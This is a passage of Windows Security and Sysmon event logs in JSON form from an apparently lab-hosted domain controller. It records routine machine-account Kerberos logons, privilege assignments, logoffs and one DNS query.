{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220439,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64001\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64001","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220440,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64001\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54921\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64001","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54921","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220441,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64001\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64001","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220442,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64068\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64068","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220443,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64068\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54922\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64068","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54922","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220444,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64068\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64068","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220445,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x645CB\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x645cb","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220446,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x645CB\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54923\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x645cb","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54923","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220447,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x645CB\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x645cb","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220448,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64676\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64676","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220449,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64676\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54924\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64676","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54924","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220450,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64676\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64676","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4274,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:59.311\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nProcessId: 2804\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:51:59.311","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001095B80200}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 05:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220451,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64AD1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special 